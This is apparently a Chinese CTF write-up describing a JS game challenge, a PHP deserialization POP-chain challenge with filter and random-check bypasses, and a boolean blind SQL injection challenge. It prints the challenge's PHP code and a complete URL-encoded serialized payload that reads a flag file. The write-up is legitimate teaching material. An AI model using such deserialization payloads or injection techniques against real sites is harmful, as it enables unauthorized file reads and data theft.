第一次参加这种正式的组队赛,被大佬带飞这种事请让我多多体验
最终成绩
在学长的鼓励和帮助下,虽然略有遗憾,不过还是取得了满意的成绩
继续沉淀

bombombom --签到题

游戏题,类似4399上的炸弹人
应该是js前台调试,查看脚本搜索flag出现条件无果
直接手打通关

苟就完了

ezpop

给出php源码,考察php反序列化构造pop链和绕过限制
调用链:

1
2
3
4
5
6
7
Ctf::__destruct

Happy::__toString

Game::__get

Game::__call

三个绕过思路:

  1. md5值:2023的md5值刚满⾜条件
  2. php过滤:双写
  3. 随机数检验:利⽤引⽤

在robots.txt发现flag位置fllllllllllllllllllllllllllllag.php

注意,由于存在过滤,还需要将序列化字符串中的变量⻓度数值进⾏修改

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
<?php
class Happy{
public $str;
public function getString(){
return "maybe you can find something in somewhere";
}
public function __toString(){
$a = $this->str->des;
return "heihei";
}
function __destruct(){
$this->str = "123";
}
}
class Ctf{
public $file="";
public $rand;
public $temp;
public function getfile(){
return "nothing";
}
function __destruct(){
$this->rand = rand(1,1000000);
if($this->rand === $this->temp){
if (preg_match("/php|flag/i", $this->file)) {
die("hacker");
}
}
}
}
class Game{
public $name ;
private $x="fllllllllllllllllllllllllllllag.pphphp";
public function __call($name, $arguments) {
$this->getflag($this->x);
}
function getflag($x){
show_source($x);
}
public function des(){
return "a class";
}
public function __get($name){
return $this->name($name);
}
}
function filter($str){
return str_replace("php", "", "$str");

本地运行后构造出payload:

1
?try_some_num=2023&pop=O%3A3%3A%22Ctf%22%3A3%3A%7Bs%3A4%3A%22file%22%3BO%3A5%3A%22Happy%22%3A1%3A%7Bs%3A3%3A%22str%22%3BO%3A4%3A%22Game%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A3%3A%22hhh%22%3Bs%3A7%3A%22%00Game%00x%22%3Bs%3A35%3A%22fllllllllllllllllllllllllllllag.pphphp%22%3B%7D%7Ds%3A4%3A%22rand%22%3BN%3Bs%3A4%3A%22temp%22%3BR%3A6%3B%7D

ScoreQuery

根据题目描述,是道sql注入
通过手测发现闭合是单引号,可以用%23注释
fuzz后发现过滤了

正常的布尔盲注就行了,用脚本爆破发现不行
只有用bp手打了


发现开始返回长度2485时候回显没有,说明此时位置就是ascii码
依次爆破表名字段 flag

将爆破出来的数据丢给chagpt